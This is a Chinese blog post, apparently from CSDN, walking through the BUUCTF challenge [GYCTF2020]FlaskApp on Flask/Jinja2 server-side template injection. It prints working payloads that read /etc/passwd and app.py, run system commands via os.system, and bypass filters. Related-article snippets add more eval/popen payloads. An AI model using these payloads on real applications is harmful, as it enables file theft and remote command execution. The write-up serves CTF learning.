Flask SSTI注入学习

VIP文章 于 2022-07-23 15:45:57 发布
阅读量496 收藏 1
点赞数
分类专栏: CTF 文章标签: flask
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LJFYYJ/article/details/125948476
版权

竞赛平台:https://buuoj.cn/

1.[GYCTF2020]FlaskApp

第零步,Flask模板注入知识梳理:

1.通过使用魔法函数可以实现,在没有注册某个模块的条件下,调用模块的功能。

__class__  返回对象所属类型
__mro__    返回对象所属类、所继承的基类元组,方法在解析时按照元组的顺序解析
__base__   返回该对象所继承的基类,一般是object,如果不是需要使用上一个方法
// __base__和__mro__都是用来寻找基类的
__subclasses__   返回子类
__init__  类的初始化方法
__globals__  对包含函数全局变量的字典的引用

例子(windows python 3.7):

''.__class__				<type 'str'>
''.__class__.__mro__		(<type 'str'>, <type 'object'>)
''.__class__.__base__		<class 'object'>
''.__class__.__mro__[1].__subclasses__() 	列出了所有子类
''.__class__.__base__.__subclasses__() 		和上面效果相同

其他例子(未知环境):

''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() 	读取文件
''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].system('ls')						执行系统命令
如果函数已经被__init__了,还可以通过下面方法执行命令:
''.__class__.__base__.__subclasses__()[5].__init__.__globals__['__builtins__']['eval']

关于内建函数:

当我们启动一个python解释器时,及时没有创建任何变量或者函数,还是会有很多函数可以使用,我们称之为内建函数。内置的函数名字会放在内建名称空间中,初始的builtins模块提供内建名称空间到内建对象的映射。

__builtins__中,有像lenstr这样熟悉的函数。

python沙盒溢出的关键:从变量->对象->基类->子类遍历->全局变量 这个流程中,找到我们想要的模块或者函数。

参考链接:SSTI/沙盒逃逸详细总结

第一步,使Base64解密报错,具体报错如下:

@app.route('/decode',methods=['POST','GET'])
def decode():
    if request.values.get('text') :
        text = request.values.get("text")
        text_decode = base64.b64decode(text.encode()) #报错位置
        tmp = "结果 : {0}".format(text_decode.decode())
        if waf(tmp) :
            flash("no no no !!")
            return redirect(url_for('decode'))
        res =  render_template_string(tmp)

函数获取text值直接解码,并将解码结果放到tmp中。如果waf函数检查发现tmp中存在注入行为,则会返回no no no !!;否则直接在模板上显示tmp。

因此,我们的目的是绕过waf函数实现注入。

第二步,读源码。

将下面的代码加密后输入解密框中(在报错提示中可以看到文件名为app.py):

{
   % for c in [].__class__.__base__.__subclasses__() %}
{
   % if c.__name__=='catch_warnings' %}
{
   {
    c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}
{
   % endif %}
{
   % endfor %}

得到报错:

 from flask import Flask,render_template_string from flask import render_template,request,flash,redirect,url_for from flask_wtf import FlaskForm from wtforms import StringField, SubmitField from wtforms.validators import DataRequired from flask_bootstrap import Bootstrap import base64 app = Flask(__name__) app.config[&#39;SECRET_KEY&#39;] = &#39;s_e_c_r_e_t_k_e_y&#39; bootstrap = Bootstrap(app) class NameForm(FlaskForm): text = StringField(&#39;BASE64加密&#39;,validators= [DataRequired()]) submit = SubmitField(&#39;提交&#39;) class NameForm1(FlaskForm): text = StringField(&#39;BASE64解密&#39;,validators= [DataRequired()]) submit = SubmitField(&#39;提交&#39;) def waf(str): black_list 
最低0.47元/天 解锁文章
目标是技术宅
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-模板注入专项刷题
m0_51563147的博客
02-27 3301
SSTI: 目录 简单 [CSCCTF 2019 Qual]FlaskLight 签到 [BJDCTF2020]Cookie is so stable twig模板注入 [WesternCTF2018]shrine 想方设法获取config [CISCN2019 华东南赛区]Web11 smarty模板注入 [BJDCTF2020]The mystery of ip [GYCTF2020]FlaskApp debug模式一定条件下可以窃取出来pin码命令执行,但是题目过滤的不够严格导致.
SSTI
03-09
SSTI
【python】Flask框架的基本使用
sysu_lluozh
02-24 3206
一、Flask介绍 Flask是一个基于Python开发并且依赖jinja2模板和Werkzeug WSGI服务的一个微型框架,对于Werkzeug本质是Socket服务端,其用于接收http请求并对请求进行预处理,然后触发Flask框架,开发人员基于Flask框架提供的功能对请求进行相应的处理,并返回给用户,如果要返回给用户复杂的内容时,需要借助jinja2模板来实现对模板的处理,即:将模板和数据进行渲染,将渲染后的字符串返回给用户浏览器 “微”(micro)并不表示需要把整个Web应用塞进单个Pytho
[pasecactf_2019]flask_ssti
cjdgg的博客
07-05 2213
[pasecactf_2019]flask_ssti 进入题目后如下图所示 因为题目本身就提示ssti了,我也就直接尝试有没有过滤了 这里过滤了下划线,使用十六进制编码绕过,_编码后为\x5f, .过滤的话我们直接用[]包含绕过 这里过滤了单引号,我们用双引号绕过 这题过滤已经找完了,接下来是构造 相当于执行{{class}} 相当于执行{{class.bases[0]}} 相当于执行{{class.bases[0].subclasses()}} 下面贴一个脚本用来找可用类 import js
buuctf pasecactf_2019]flask_ssti
qq_40800734的博客
06-29 2409
1.测试存在ssti 2.获取类型所属的对象,后面显示被过滤了,看了大佬的文章_'.这三个被过滤了,但可以用十六进制绕过 3.寻找基类 4.寻找可用引用 {{()["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fbases\x5f\x5f"][0]["\x5f\x5fsubclasses\x5f\x5f"]()}} 5.接下来就是开始一系列利用了(基础不是很好,后面的待填坑)一些大佬的方法: 自己的一些总结:使用[]好像可以自动补.号 以下是等价的
buuctf [pasecactf_2019]flask_ssti
CyhDl666的博客
03-18 1171
题目已经告诉是SSTI模板注入了 测试一下 做题时用""发现了过滤 fuzz一下 过滤了很多东西 想到去年打校赛自己未解出来的一题 结合题目提示 是个16进制转换 附上自己写的python脚本 code = "/proc/self/fd/1" ssti = "" length = len(code) for i in range(length): ssti += "\\x" + hex(ord(code[i]))[2:] print(ssti) 将下面内容转化为16进制 __class__.
fenjing工具,ssti
12-17
fenjing一把梭哈ssti,简单绕过waf
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip
最新发布
01-27
2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,作为参考资料学习借鉴。 3、本资源作为“参考资料”如果需要实现其他功能,需要能看懂代码,并且热爱钻研,自行调试。 全国大...
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板。 模板引擎旨在通过将固定模板与易失性数据结合来生成网页。 当用户输入直接连接...
Python-Arjun是一个用于查找隐藏的GET和POST参数的python脚本
08-10
Arjun是一个python脚本,用于使用regex和bruteforce查找隐藏的GET和POST参数。
BUUCTF__web题解合集(九)
风过江南乱的博客
09-23 980
1、[GYCTF2020]FlaskApp 2、[NPUCTF2020]ReadlezPHP 3、[MRCTF2020]Ezpop 4、[极客大挑战 2019]RCE ME 5、[CISCN2019 总决赛 Day2 Web1]Easyweb、
模板注入SSTi笔记
jie_a的博客
04-14 315
模板注入SSTijinja2Smarty模板 jinja2 命令执行 {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('在这里输命令').read()") }}{% endif %}{% endfor %} 文件读写 {% for c
BUUCTF SSTI模板注入小结(持续更新)
CN天狼
05-02 1243
BUUCTF部分SSTI模板注入小结 [护网杯 2018]easy_tornado [BJDCTF2020]The mystery of ip [BJDCTF2020]Cookie is so stable [CISCN2019 华东南赛区]Web11 [WesternCTF2018]shrine [GYCTF2020]FlaskApp [CSCCTF 2019 Qual]FlaskLight
Python flask渲染模板注入
weixin_40872714的博客
04-07 3963
2018-TokyoWesterns-Web-shrine 参考链接: https://blog.csdn.net/Onlyone_1314/article/details/121875761 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') #Flask提供了很多种方式来加载配置。比如,你可以像在字典中添加一个键值对一样来 #设置一个配置:app.config[‘FL
BUUCTF 34
qq_52431855的博客
03-02 154
知识点 os.listdir() 方法用于返回指定的文件夹包含的文件或文件夹的名字的列表。 什么是phar反序列化:传送门 34-1[GYCTF2020]FlaskApp 做题思路 打开题目发现一个base64加密解密的界面 其中还有一个提示,点开提示写到 据WP得知 应该由此能想到Flask的debug模式。。 base64decode在不会解析的时候就会报错,然后习惯性对base64解密页面进行报错实验,base64解密界面随意输入字符串,导致解码报错,进入Debug页面,发现了部分..
Buuctf之web(五)
qq_50589021的博客
12-14 6439
Greatphp 使用 Error/Exception 内置类绕过哈希比较 可见,需要进入eval()执行代码需要先通过上面的if语句: if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ) 这个乍看一眼在ctf的基础题目中非常常见,一般情况下只需要使
BUU系列
qq_49422880的博客
07-16 285
[GYCTF2020]FlaskApp    开始打开这个靶场,发现这是一个加解密的应用,我们可以进行base64加解密,开始寻找网页的源代码,使用脚本扫描目录文件也没有什么发现,查看应用的网页源代码也没有发现。之前所解的一道题是一个基于flask框架的SSRF,然后就疯狂在输入框里面输入命令,看看有什么命令是执行的,试了几次之后发现有这样一个过程。我试了试{{3+7}}这种简单的注入测试发现加密的结果是10的base64加密,那这样子肯定是存在一个命令执行漏洞的(存在SSTI漏洞),之后的注入当中发现在
arjun和tplmap
scrawman的博客
11-11 1317
借这道题讲一下这两个工具的使用 https://github.com/s0md3v/Arjun
ssti模板注入payload
09-26
SSTI(服务器端模板注入)是指攻击者能够将恶意有效载荷注入到服务器端模板中,然后在服务器端执行该模板。攻击者利用模板引擎生成前端的HTML代码,通过将用户的数据放到渲染函数中来生成模板,最终将生成的HTML页面...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值